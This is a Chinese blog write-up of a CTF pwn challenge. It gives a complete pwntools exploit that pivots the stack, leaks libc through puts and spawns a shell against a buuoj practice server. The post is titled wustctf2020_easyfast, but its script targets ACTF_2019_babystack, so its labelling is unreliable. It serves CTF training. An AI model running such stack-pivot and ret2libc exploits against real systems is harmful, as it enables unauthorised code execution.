wustctf2020_easyfast

最新推荐文章于 2024-02-06 21:27:21 发布
最新推荐文章于 2024-02-06 21:27:21 发布
阅读量138 收藏
点赞数
分类专栏: pwn刷题 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73756460/article/details/129477008
版权

wustctf2020_easyfast

惯例我们先来checksec一下

请添加图片描述

开启了NX保护的64位程序 放进ida64里看看

可以发现我们最大可以输入的大小是0xe0也就是说可以溢出一个rbp和ret addr的距离因此考虑栈迁移

关于栈迁移的知识点大家可以去看Max1z师傅的这篇博客 写的很详细 也很清楚

栈迁移原理介绍与应用 - Max1z - 博客园 (cnblogs.com)

请添加图片描述

由于题目中已经为我们提供了我们写入的地址 我们只需要将其接收即可

io.recvuntil(b"message?\n")
payload=str(0xe0)
io.sendline(payload)
io.recvuntil(b"0x")
addr=int(io.recv(12),16)

然后利用栈迁移打印puts_addr将其接收后利用LibcSearcher来获得libc 然后计算出基地址 再通过及地址计算出system和/bin/sh的地址 最后返回main函数开头为下一次栈迁移做准备

print(hex(addr))
payload=b'aaaaaaaa'
payload+=p64(rdi) + p64(puts_got) + p64(puts_plt) + p64(main)
payload=payload.ljust(0xd0,b'a')
payload+=p64(addr)+p64(leave)
io.send(payload)
puts_addr = u64(io.recvuntil('\x7f')[-6:].ljust(8, b'\x00'))
print(hex(puts_addr))
libc=LibcSearcher('puts',puts_addr)
base=puts_addr-libc.dump('puts')
system=libc.dump('system')+base
bin_sh=libc.dump('str_bin_sh')+base

第二次我们先重复第一个步骤获取栈地址

然后我们利用栈迁移执行system(/bin/sh)来获取控制权 最后cat flag即可

io.recvuntil(b"message?\n")
payload=str(0xe0)
io.sendline(payload)
io.recvuntil(b"0x")
addr=int(io.recv(12),16)

payload=b'aaaaaaaa'+p64(ret)
payload+=p64(rdi) + p64(bin_sh) + p64(system) + p64(main)
payload=payload.ljust(0xd0,b'a')
payload+=p64(addr)+p64(leave)
io.send(payload)

请添加图片描述

exp:

from pwn import *
from LibcSearcher import *

#io=process("./ACTF_2019_babystack")
io=remote('node4.buuoj.cn',25048)
elf=ELF('./ACTF_2019_babystack')
puts_plt=elf.plt['puts']
puts_got=elf.got['puts']
main=0x4008F6
leave=0x400a18
ret=0x400709
rdi=0x400ad3

io.recvuntil(b"message?\n")
payload=str(0xe0)
io.sendline(payload)
io.recvuntil(b"0x")
addr=int(io.recv(12),16)

print(hex(addr))
payload=b'aaaaaaaa'
payload+=p64(rdi) + p64(puts_got) + p64(puts_plt) + p64(main)
payload=payload.ljust(0xd0,b'a')
payload+=p64(addr)+p64(leave)
io.send(payload)
puts_addr = u64(io.recvuntil('\x7f')[-6:].ljust(8, b'\x00'))
print(hex(puts_addr))
libc=LibcSearcher('puts',puts_addr)
base=puts_addr-libc.dump('puts')
system=libc.dump('system')+base
bin_sh=libc.dump('str_bin_sh')+base

io.recvuntil(b"message?\n")
payload=str(0xe0)
io.sendline(payload)
io.recvuntil(b"0x")
addr=int(io.recv(12),16)

payload=b'aaaaaaaa'+p64(ret)
payload+=p64(rdi) + p64(bin_sh) + p64(system) + p64(main)
payload=payload.ljust(0xd0,b'a')
payload+=p64(addr)+p64(leave)
io.send(payload)

io.interactive()
爱若 AI_ruo
关注
专栏目录
buuctf wustctf2020_getshell_2 ret2shellcode
weixin_45441024的博客
12-01 687
BUUCTF wustctf2020_getshell_2 check一下,32位的程序且没有开任何保护 用ida打开,vuln很明显这是一个漏洞函数,f5查看一下伪代码,可以看到buf距离栈底0x18个字节 这是shell函数的伪代码,我们可以看到虽然这个并不是我们想要的shell(不是/bin/sh),但是程序里面有sh的字符串可以供我们利用,那我们现在就查找一下"sh"所在的位置 $ ROPgadget --binary '/home/pwn/Desktop/wustctf2020_getshe
BUUCTF_Crypto_[WUSTCTF2020]B@se
qq_58370970的博客
03-07 871
给了一个txt文件: 从题目可以看出是与base64相关,不难发现是base64的变种,将base64的顺序改变了,但还有4个字符不知道 可以写python脚本得到缺失的4个字符 代码如下: import string s = 'JASGBWcQPRXEFLbCDIlmnHUVKTYZdMovwipatNOefghq56rs****kxyz012789+/' j = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+
[BUUCTF]pwn - wustctf2020_easyfast (Use After Free)
半岛铁盒的博客
06-10 430
打开菜单,了解到相应的功能后,改一下名字 这个漏洞大致利用方式是这样的; 利用思路 通过double free修改chunk0的fd指针,让申请到的chunk能够覆盖到0x602090,修改1为0,最后直接调用backdoor来getshell from pwn import * #p=process('./wustctf2020_easyfast') p=remote("node3.buuoj.cn",25044) context.log_level="debug" def add(si
wustctf2020_easyfast(uaf)
m0_51251108的博客
11-05 566
wustctf2020_easyfast: 逆向分析: 主界面: add函数: free函数: edit函数: backdoor: 这题是libc2.23的doublefree,注意区别 引用这位师傅的回顾double free手法 在glibc2.27之前,主要是fastbin double free: fastbin在free时只会检查现在释放的chunk,是不是开头的chunk,因此可以通过free(C1), free(C2), free(C1)的手法绕过 并在在fastbin取出时,
[BUUCTF]-PWN:wustctf2020_easyfast解析(fastbin double free)
最新发布
2301_79326813的博客
02-06 328
又是堆题,查看保护再看ida大致就是alloc创建堆块,free释放堆块,fill填充堆块,以及一个getshell的函数,但要满足条件。值得注意的是free函数没有清空堆块指针所以可以用double free有两种解法。
buu-[WUSTCTF2020]level4
qaq517384的博客
03-14 3163
64位elf文件 先运行 Traversal type 1:2f0t02T{hcsiI_SwA__r7Ee} Traversal type 2:20f0Th{2tsIS_icArE}e7__w Traversal type 3: //type3(&x[22]); No way! ida查看字符串无恙 查看main函数 int __cdecl main(int argc, const char **argv, const char **envp) { puts("Practice m
从零开始做题:[WUSTCTF2020]girlfriend
weixin_44626085的博客
12-06 1291
(base) ┌──(holyeyes㉿kali2023)-[~/Misc/题目/girlfriend/dtmf-decoder](base) ┌──(holyeyes㉿kali2023)-[~/Misc/题目/girlfriend/dtmf-decoder](base) ┌──(holyeyes㉿kali2023)-[~/Misc/题目/girlfriend]利用老式按键手机的打字方法所实现的一种密码。拨打电话每个按键被按下发出的声音不一样。按提示来安装缺少的模块。
[WUSTCTF2020]情书
2er0!=O的博客
07-23 822
[WUSTCTF2020]情书 附件: Premise: Enumerate the alphabet by 0、1、2、..... 、25 Using the RSA system Encryption:0156 0821 1616 0041 0140 2130 1616 0793 Public Key:2537 and 13 Private Key:2537 and 937 flag: wctf2020{Decryption} #前提:用0、1、2、…..枚举字母表25 #使用RSA系统 #加密
wustctf 2020 easyfast 做题笔记
fa1c4的blog
09-06 365
前言 一道fastbin attack (fastbin double free/ 其实BUU这题是UAF) 的题目 BUU有环境 分析过程 分析之后重命名各个函数 void sub_400ACD() { char s[8]; // [rsp+0h] [rbp-20h] BYREF __int64 v1; // [rsp+8h] [rbp-18h] unsigned __int64 v2; // [rsp+18h] [rbp-8h] v2 = __readfsqword(0x28u);
[WUSTCTF2020]朴实无华 ctf
wuyaowangchuan的博客
11-10 491
[WUSTCTF2020]朴实无华 知识点: intval函数 php MD5 弱比较 tac读取文件 ${IFS}空格绕过 进入环境 robots.txt里面有东西 进去这个文件 好家伙 假的flag 就在这个页面到处看看 响应头里面又有东西 访问 朴实无华,我知道题目为啥叫朴实无华了 接下来代码审计 我电脑的编码好像有问题,中文是乱码 不过问题不大 我去复制别人的 //level 1 if (isset($_GET['num'])){ $num = $_GET['num'];
buu easyfast —— fastbin attack 基础
weixin_48066554的博客
05-24 302
buu easyfast —— fastbin attack 基础 文章目录buu easyfast —— fastbin attack 基础引入初分析checksec伪代码思路exp 引入 面对恐惧,开始啃堆,柿子挑软的捏 初分析 题目默认环境Ubuntu16.04,该系统默认使用libc2.23,建议使用docker环境 checksec 伪代码 add unsigned __int64 add_400916() { int v0; // eax int v1; // ebx char
练[WUSTCTF2020]朴实无华
m0_66225311的博客
09-30 262
目录扫描,抓包放包,代码审计,php函数特性的了解:`intval`函数,`md5`特性绕过,RCE一些`bypass`方法
[WUSTCTF2020]level4题解
于高山之巅,方见大河奔涌;于群峰之上,更觉长风浩荡。
01-14 614
buuctf-[WUSTCTF2020]level4题解
[WUSTCTF2020]dp_leaking_1s_very_d@angerous
2er0!=O的博客
07-23 708
[WUSTCTF2020]dp_leaking_1s_very_d@angerous 附件: e = 65537 n = 156808343598578774957375696815188980682166740609302831099696492068246337198792510898818496239166339015207305102101431634283168544492984586566799996471150252382144148257236707247267506165670877506
[WUSTCTF2020]level4
寻梦&之璐
05-12 491
文章目录拖进ida执行结果总结: 拖进ida int __cdecl main(int argc, const char **argv, const char **envp) { puts("Practice my Data Structure code....."); puts("Typing....Struct.....char....*left....*right............emmmmm...OK!"); init(); puts("Traversal!"); prin
WUSTCTF2020 web题 --- 大人, 时代变了
qq_42436176的博客
07-19 4865
文章目录0x0 前言0x1 前端审计抓包逻辑分析解密算法0x2 验证码识别分析验证码处理特征提取0x3 代理池0x4 全部代码主体特征点0x5 题目源码前端App.tsxDrawer.tsx后端views.pyutils.pymodels.py 0x0 前言 出这个题的本意是看到CTF的web题老是PHP什么的, 感觉和现实情况有点脱节, 且对前端审计没有太大的要求, 于是出了这个"现代"一点的题. 这个题目模拟的是爬虫, 在多次请求后将会出现验证码, 再频繁访问将会封锁ip, 且网站是使用React写的,
[WUSTCTF2020]朴实无华
SopRomeo的博客
05-20 1514
没啥提示,扫下目录 dirsearch 扫到robots.txt 进去看看 访问这个假的flag 扫不到其他东西了,抓个包看看 藏在这里头去了 看看代码 Warning: Cannot modify header information - headers already sent by (output started at /var/www/html/fl4g.php:2) in /var/www/html/fl4g.php on line 3 <img src="/img.jpg"&g.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值